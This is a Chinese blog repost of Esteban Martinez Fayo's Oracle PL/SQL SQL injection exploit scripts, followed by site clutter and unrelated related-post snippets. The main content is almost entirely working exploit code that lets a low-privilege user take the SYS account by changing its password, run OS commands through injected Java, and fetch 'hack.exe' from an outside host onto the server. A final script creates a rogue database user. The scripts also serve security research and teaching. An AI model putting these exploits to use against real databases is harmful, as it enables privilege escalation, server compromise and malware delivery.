oracle pl sql 漏洞,Oracle Database PL/SQL Statement Multiple SQL Injection Exploits

于 2021-04-13 22:08:31 发布
阅读量124 收藏
点赞数
文章标签: oracle pl sql 漏洞
这篇博客详细介绍了针对Oracle数据库的高级SQL注入技术,包括如何利用SQL注入改变和恢复SYS用户的密码,以及如何通过SQL注入执行操作系统命令。作者提供了创建函数和过程的示例,展示了如何利用SQLIVULN这个易受攻击的存储过程来实现权限提升和执行系统命令。
摘要由CSDN通过智能技术生成

/*

Advanced SQL Injection in Oracle databases

Becoming the SYS user with SQL Injection.

This script creates functions that can be injected to replace

the password of the SYS user and to restore it to the original value.

By Esteban Martinez Fayo

secemf@gmail.com

*/

------------

-- Execute this as a low privilege user

------------

--This table is optional if you don't want to save the old SYS password

CREATE TABLE "SCOTT"."PSW_DATA" ("USERNAME" VARCHAR2(32 byte) NOT NULL,

"PSW_HASH" VARCHAR2(30 byte) NOT NULL);

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI_CHANGEPSW" return varchar2

authid current_user as

pragma autonomous_transaction;

ROW_COUNT NUMERIC;

PSW VARCHAR2(30);

BEGIN

EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM SCOTT.PSW_DATA' INTO ROW_COUNT;

IF (ROW_COUNT <= 0) THEN

EXECUTE IMMEDIATE 'INSERT INTO SCOTT.PSW_DATA select username,

password from dba_users where username=''SYS''';

EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY newpsw';

END IF;

COMMIT;

RETURN '';

END;

/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI_RESTOREPSW" return varchar2

authid current_user as

pragma autonomous_transaction;

PSW_HASH VARCHAR2(30);

BEGIN

EXECUTE IMMEDIATE 'SELECT PSW_HASH FROM SCOTT.PSW_DATA WHERE

USERNAME = ''SYS''' INTO PSW_HASH;

EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES ''' || PSW_HASH || '''';

EXECUTE IMMEDIATE 'DELETE FROM SCOTT.PSW_DATA where username=''SYS''';

COMMIT;

RETURN '';

END;

/

-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists

-- in a single PL/SQL statement (not in an anonymous PL/SQL block).

-- See file SQLInjectionLimitation.sql

-- To change the SYS password execute:

EXEC SYS.SQLIVULN('MANAGER''||SCOTT.SQLI_CHANGEPSW()||''');

-- To restore the SYS password execute:

EXEC SYS.SQLIVULN('MANAGER''||SCOTT.SQLI_RESTOREPSW()||''');

--------------------------------------------------------------------------------------------------------

/*

Advanced SQL Injection in Oracle databases

Executing OS Command with SQL Injection

By Esteban Martinez Fayo

secemf@gmail.com

*/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2

authid current_user as

pragma autonomous_transaction;

SqlCommand VARCHAR2(2048);

BEGIN

SqlCommand := '

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS

import java.lang.*;

import java.io.*;

public class ExecuteOS

{

public static void printFile (String fileName) throws IOException

{

File fileOut;

FileReader fileReaderOut;

BufferedReader buffReader;

String strRead;

fileOut = new File (fileName);

fileReaderOut = new FileReader (fileOut);

buffReader = new BufferedReader(fileReaderOut);

while ((strRead = buffReader.readLine()) != null)

System.out.println(strRead);

}

public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException

{

String[] strCmd = {"cmd.exe", "/c", "1>c:\\stdout.txt", "2>c:\\stderr.txt", cmd};

System.out.println("==========\r\nExecuting OS command...");

Process p = Runtime.getRuntime().exec(strCmd);

p.waitFor();

System.out.println("\r\n==========\r\nThis was the STANDARD OUTPUT for the command:");

printFile ("c:\\stdout.txt");

System.out.println("\r\n==========\r\nThis was the ERROR OUTPUT for the command:");

printFile ("c:\\stderr.txt");

}

}';

execute immediate SqlCommand;

SqlCommand := '

CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2)

AS LANGUAGE JAVA

NAME ''ExecuteOS.execOSCmd (java.lang.String)'';';

execute immediate SqlCommand;

execute immediate 'GRANT EXECUTE ON PROC_EXECUTEOS TO SCOTT';

commit; -- Must do a commit

return ''; -- Must return a value

END;

/

-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists

-- in a single PL/SQL statement (not in an anonymous PL/SQL block).

-- See file SQLInjectionLimitation.sql

EXEC SYS.SQLIVULN('MANAGER''||SCOTT.SQLI()||''');

/

SET SERVEROUTPUT ON

/

CALL dbms_java.set_output(1999);

/

EXEC sys.proc_executeos ('dir');

--------------------------------------------------------------------------------------------------------

/*

Advanced SQL Injection in Oracle databases

By Esteban Martinez Fayo

secemf@gmail.com

*/

------------

-- Execute this as a SYS

------------

-- SQLVULN is a procedure vulnerable to SQL Injection. The vulnerability exists

-- in a single PL/SQL statement (not in an anonymous PL/SQL block).

CREATE OR REPLACE PROCEDURE "SYS"."SQLIVULN" (P_JOB VARCHAR2)

AS

AVGSAL Numeric;

BEGIN

EXECUTE IMMEDIATE 'SELECT AVG(SAL) FROM SCOTT.EMP WHERE JOB = '''||P_JOB||'''' INTO AVGSAL;

DBMS_OUTPUT.PUT_LINE('Average salary for the job is: '||AVGSAL);

END;

/

GRANT EXECUTE ON "SYS"."SQLIVULN" TO "SCOTT"

/

------------

-- Execute this as a low privilege user

------------

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2

authid current_user as

BEGIN

execute immediate 'INSERT INTO SYS.PPT (PPC) VALUES (''55'')';

commit;

return '';

END;

/

--To exploit

EXEC SYS.SQLIVULN('MANAGER'' || SCOTT.SQLI() || ''');

-- This gives an Oracle Error

--------------------------------------------------------------------------------------------------------

/*

Advanced SQL Injection in Oracle databases

Uploading a file with SQL Injection

SYS.SQLIVULN is a procedure vulnerable to SQL Injection

By Esteban Martinez Fayo

secemf@gmail.com

*/

CREATE OR REPLACE FUNCTION "SCOTT"."SQLI" return varchar2

authid current_user as

pragma autonomous_transaction;

SqlCommand VARCHAR2(2048);

BEGIN

SqlCommand := '

CREATE OR REPLACE JAVA SOURCE NAMED "SRC_FILE_UPLOAD" AS

import java.lang.*;

import java.io.*;

public class FileUpload {

public static void fileUpload(String myFile, String url) throws Exception

{

File binaryFile = new File(myFile);

FileOutputStream outStream = new FileOutputStream(binaryFile);

java.net.URL u = new java.net.URL(url);

java.net.URLConnection uc = u.openConnection();

InputStream is = (InputStream)uc.getInputStream();

BufferedReader in = new BufferedReader (new InputStreamReader (is));

byte buffer[] = new byte[1024];

int length = -1;

while ((length = is.read(buffer)) != -1) {

outStream.write(buffer, 0, length);

outStream.flush(); }

is.close(); outStream.close();

} };';

execute immediate SqlCommand;

SqlCommand := '

CREATE OR REPLACE PROCEDURE "PROC_FILEUPLOAD" (p_file varchar2, p_url varchar2)

AS LANGUAGE JAVA

NAME ''FileUpload.fileUpload (java.lang.String, java.lang.String)'';';

execute immediate SqlCommand;

execute immediate 'GRANT EXECUTE ON PROC_FILEUPLOAD TO SCOTT';

commit; -- Must do a commit

return ''; -- Must return a value

END;

/

SET SERVEROUTPUT ON

/

CALL dbms_java.set_output(1999);

/

-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection.

-- The vulnerability exists

-- in a single PL/SQL statement (not in an anonymous PL/SQL block).

-- See file SQLInjectionLimitation.sql

EXEC SYS.SQLIVULN('MANAGER''||SCOTT.SQLI()||''');

/

-- Call the procedure created in the SQL Injection

EXEC sys.proc_fileupload ('c:\hack.exe', 'http://hackersite/hack.exe');

--------------------------------------------------------------------------------------------------------

/*

Advanced SQL Injection in Oracle databases

Example of a function derfined with authid current_user

vulnerable to SQL Injection in a PL/SQL anonymous block.

By Esteban Martinez Fayo

secemf@gmail.com

*/

------------

-- Execute this as a SYS or any other user that can create functions

------------

-- SQLIVULN_CUR_USR is a function vulnerable to SQL Injection in a PL/SQL anonymous

-- block that executes with the privilege of the caller (defined with AUTHID CURRENT_USER).

CREATE OR REPLACE FUNCTION "SYS"."SQLIVULN_CUR_USR" (P_JOB VARCHAR2)

return VARCHAR2

authid current_user as

AVGSAL Numeric;

BEGIN

EXECUTE IMMEDIATE 'BEGIN SELECT AVG(SAL) INTO :AVGSAL FROM SCOTT.EMP

WHERE JOB = '''||P_JOB||'''; END;' USING OUT AVGSAL;

return '';

END;

/

GRANT EXECUTE ON "SYS"."SQLIVULN_CUR_USR" TO "SCOTT"

/

-- SYS.SQLIVULN is a procedure vulnerable to SQL Injection. The vulnerability exists

-- in a single PL/SQL statement (not in an anonymous PL/SQL block).

-- See file SQLInjectionLimitation.sql

-- To Exploit the attacker could execute:

EXEC SYS.SQLIVULN('MANAGER''||SYS.SQLIVULN_CUR_USR(''AA''''; execute immediate

''''declare pragma autonomous_transaction; begin execute immediate ''''''''create

user eric identified by newpsw''''''''; commit; end;''''; end;--'')||''');

Ke Shi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP Exploits and the SQL Injection Attack
03-02
SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过插入恶意SQL语句到查询中,从而获取敏感数据或控制数据库。 - **原理**:攻击者通常会在Web表单或其他用户输入字段中插入恶意SQL代码。例如,在登录表单中,...
ora-exploits-classic:Oracle 经典注入漏洞利用库 - Perl 和 SQL 版本
05-31
Oracle 经典注入漏洞存储库 - Perl 和 SQL 版本 SQL  ctxsys-drvxtabc-create_tables.sql  dbms_cdc_subscribe.sql  dbms_exp_ext.sql  dbms_meta_get_ddl.sql  kupm-mcpmain.sql  kupv-ft_attach...
PL/SQLSQL注入
小笋的技术随笔
02-22 368
SQL注入,一个老掉牙的安全问题,有SQL的地方就会有SQL注入。一般做企业应用的只关注Java层面的编写规范,比如使用preparedStatement,或者干脆直接过滤掉危险字符等等。 其实在编写PL/SQL的function或procedure的时候,也存在注入的问题,我们来简单探讨一下。   例如有这样一个procedure,功能为禁用某个table的constraint: CRE...
OracleSQL注入
素心侠气的博客
07-21 2505
百度百科对SQL注入的描述是这样的:“用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。”这有点含混不清,到底如何“提交一段数据库查询代码”呢?         其实SQL注入是一种安全漏洞,假设应用程序如果接受终端用户的SQL输入,那么在输入中拼接一部分SQL代码后传递给应用,应用就会给出终端用户本来没有权限查看的
SQL Injection through HTTP Headers
收集盒 Book box
07-05 1178
During vulnerability assessment or penetration testing, identifying the input vectors of the target application is a primordial step. Sometimes, when dealing with Web application testing, verification
SQL Injection
kezhen的专栏
03-23 2646
https://www.owasp.org/index.php/SQL_Injection Overview A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A succe
Nginx中防止SQL注入攻击的相关配置介绍
09-30
在Nginx中防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
ora-exploits-evilcursor:Oracle Evil 游标注入漏洞利用库 - Perl 和 SQL 版本
05-31
ora-exploits-evilcursor Oracle Evil 游标注入漏洞利用存储库 - Perl 和 SQL 版本SQL  bunkerview.sql  ctxsys-drvxtabc-create_tablesV2.sql  dbms_cdc_subscribeV2.sql  dbms_meta_get_ddlV2.sql  kupm...
小榕SQL注入-wis,wed工具包
01-06
1. wis(Web SQL Injection Scanner):这是一个自动化SQL注入扫描器,它可以对目标网站进行深度扫描,检测是否存在SQL注入漏洞。wis通过模拟多种类型的SQL注入攻击,例如错误基线注入、时间延迟注入、盲注等,来...
大物实验下MOOC题目答案 .pdf
08-18
文件概述: 大物实验下MOOC题目答案.pdf 是为物理学实验课程中的MOOC题目提供的答案汇编文件。该文件专门为物理学科的实验课程设计,旨在帮助学生更好地理解实验内容和提高解决问题的能力。文件内容涵盖了大量的实验题目及其详细答案,提供了一种有效的复习和学习工具。 文件内容: 实验题目:涵盖了物理实验课程中的各种MOOC题目,这些题目包括实验设计、数据分析、理论验证等方面,帮助学生深入理解实验内容。 详细解答:针对每个题目提供了详细的解答步骤和方法,包括实验操作流程、数据处理过程和理论分析。这些解答帮助学生理解实验的关键步骤和原理。 解题技巧:提供了一些解题技巧和常见错误的分析,帮助学生在实际实验和问题解答中避免常见陷阱,提高解题效率。 使用说明: 下载并打开该PDF文件后,建议学生首先浏览实验题目,然后仔细阅读对应的答案和解答步骤。通过对比自己的实验结果和答案,检查理解和解决方法的准确性。利用解答中的技巧和方法,进一步提高自己的实验操作和数据分析能力。 该文件旨在作为学习和复习的辅助工具,帮助学生有效地掌握物理实验课程的核心知识点,提升实验技能和问题解决能力。
2024申博白皮书(面试攻略、笔试攻略)
08-18
白皮书旨在帮助硕士生了解和规划申博之路。它首先分析了博士申请形势,包括招生人数增加、报考人数增多等趋势,并介绍了国内外申博的多种类型,例如直博、统考、审核制、同等学力申博等。接着,白皮书详细讲解了如何选择院校和套磁导师,以及申博文书的撰写技巧,包括个人简历、研究计划、个人陈述和推荐信。最后,白皮书还提供了复试的攻略,包括笔试和面试的准备方法,以及常见问题的回答思路。总而言之,这份白皮书为硕士生申博提供了全面的指导和参考。 一、博士申请形势分析 博士招生人数: 分析了近年来博士招生人数的增长趋势,以及不同高校的招生情况。 二、博士申请类型 三、选择导师和套磁 四、申博文书 五、复试 复试类型: 介绍了笔试和面试两种复试类型,以及各自的考查重点。 笔试攻略: 介绍了笔试的时间安排、答题次序、文字书写、答题量、重点突出、思维严谨、难题偏题应对等方面的技巧。 面试类型: 介绍了与导师单独面试和由院校委员组织的多人面试两种面试形式,以及面试委员会的组成人员。 面试攻略: 介绍了常规准备、informal 面试和正式面试的注意事项,以及常见的面试问题。 六、常见问题汇总 列举了十个常见的面试问题
Delphi 12 控件之ZipForge-695.zip
08-18
ZipForge_695.zip
基于语义分割,对GEOTIFF格式的光学卫星遥感图像进行多种地表类型的实时面积计算,并进行时序预测+python源代码+文档说明
08-18
<项目介绍> - 基于语义分割,对GEOTIFF格式的光学卫星遥感图像进行多种地表类型的实时面积计算,并进行时序预测 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Mega Shapes v2.49.unitypackage
08-18
Mega Shapes v2.49
XSS与DDoS攻击:理解Web应用的双重威胁
08-18
跨站脚本攻击(XSS)和分布式拒绝服务攻击(DDoS)是两种常见的网络安全威胁。XSS攻击允许攻击者将恶意脚本注入到用户浏览器中,而DDoS攻击则旨在通过大量流量压垮目标服务器。当XSS与DDoS结合时,攻击者可以利用受感染的浏览器作为DDoS攻击的代理,从而放大攻击效果。本文将详细探讨这种攻击方式的工作原理、风险以及如何防范。 XSS与DDoS的结合使用构成了一种严重的网络安全威胁。通过本文的分析,我们了解到这种攻击方式的工作原理、潜在危害以及有效的防御措施。作为开发者和安全专家,我们必须采取积极措施来保护Web应用不受这类攻击的影响,确保用户数据的安全和服务的可用性。 请注意,本文的目的是教育和提高网络安全意识,不鼓励或指导进行任何形式的非法活动。
后端编程语言:Node.js.zip
08-18
后端技术系列教程,包括: API开发全套教程 后端安全全套教程 后端微服务架构全套教程 后端性能优化全套教程 后端框架全套教程 后端缓存技术全套教程 后端编程语言全套教程 数据库技术全套教程
Shop Props Pack v1.1.unitypackage
最新发布
08-18
Shop Props Pack v1.1
https://github.com/ylcangel/exploits/tree/master/heap
10-01
https://github.com/ylcangel/exploits/tree/master/heap 是一个GitHub仓库,其中包含有关堆漏洞的一些利用代码。这些代码主要用于测试和研究堆漏洞的安全性。堆漏洞是指在程序运行时,由于对堆内存管理不当而导致的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值